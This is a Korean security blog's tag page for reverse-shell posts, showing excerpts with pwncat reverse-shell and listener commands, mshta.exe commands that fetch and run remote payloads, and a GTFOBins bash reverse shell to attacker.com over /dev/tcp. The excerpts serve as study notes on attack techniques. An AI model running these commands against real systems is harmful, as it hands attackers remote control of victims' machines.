본문 바로가기
  • Tried. Failed. Logged.
728x90

리버스쉘4

네트워크 해킹 - pwncat 리버스쉘 명령어 pip 설치 명령어 pip install pwncat victim(클라이언트)이 공격자(서버) 접속을 위한 설치 명령어 sudo pip install pwncat-cs 위는 공격자가 python3 -m pwncat 명령어를 쓰기 위한 설치 명령어 TCP Reverse shell(클라이언트) pwncat -e '/bin/bash' example.com 4444 pwncat -e '/bin/bash' example.com 4444 --reconn --reconn-wait 10 10초마다 재연결 시도 공격자 리버스쉘 서버 오픈 python3 -m pwncat -lp 4444 pwncat 프롬프트 명령어 / 단축키 sessions: 연결된 victim들 확인 sessions {ID}: 상호작용 하려는 victi.. 2023. 3. 16.
시스템 보안 - 윈도우 MSHTA(Microsoft HTML Application) 공격 command-line mshta.exe vbscript:Close(Execute("GetObject(""script:http://127.0.0.1:4444/payload.sct"")")) mshta.exe http://127.0.0.1:4444/payload.hta mshta.exe \\127.0.0.1\folder\payload.hta payload.hta (SCT payloads) 결과 HTA(HTML Application) 보는 것처럼 윈도우에 기본적으로 설치된 mshta.exe(Microsoft HTML Application)는 마치 웹 브라우저처럼 외부에 있는 웹 페이지를 요청하는 기능을 가지고 있다. 여기서 문제점은 여기에 내장된 브라우저가 인터넷 익스플로러 기반인지 ActiveXObject.. 2023. 2. 7.
보안 - GTFOBins, 시스템 보안 무력화 명령어 모음들 https://gtfobins.github.io/ GTFOBins pg Shell File read SUID Sudo gtfobins.github.io 예시) Bash 리버스 쉘 활성화 명령어 export RHOST=attacker.com export RPORT=12345 bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT 2023. 1. 22.
웹 보안 - 바인드 쉘, 리버스 쉘, 더블 리버스 쉘 바인드 셸은 타깃 디바이스에 설치된 셸의 일종이다. 공격 대상이 되는 호스트의 특정 포트에 바인딩돼 디바이스에 대해 수신 대기하며, 해커는 원격으로 이 웹셸에 액세스해 대상 호스트에서 스크립트를 실행하는 데 사용할 수 있다. 리버스 셸은 공격자가 보안 취약점을 이용해 호스트 컴퓨터에 원격으로 연결할 수 있도록 한 후, 공격자가 자산의 포트를 열면 호스트 컴퓨터가 공격자의 포트에 접속하는 방식이다. 그 이후 공격자는 피해자의 컴퓨터를 마음대로 조종할 수 있다. 더블 리버스 셸은 공격 대상이 되는 호스트가 해커로부터 공격을 받는 포트가 아닌 별도의 포트로 해커의 장치에 연결되는 것이다. 따라서 입력 트래픽 포트와 출력 트래픽 포트 등 서로 다른 두 개의 연결포트가 있다. 웹셸을 서버에 올리는 방법은 파일 업.. 2022. 12. 5.
728x90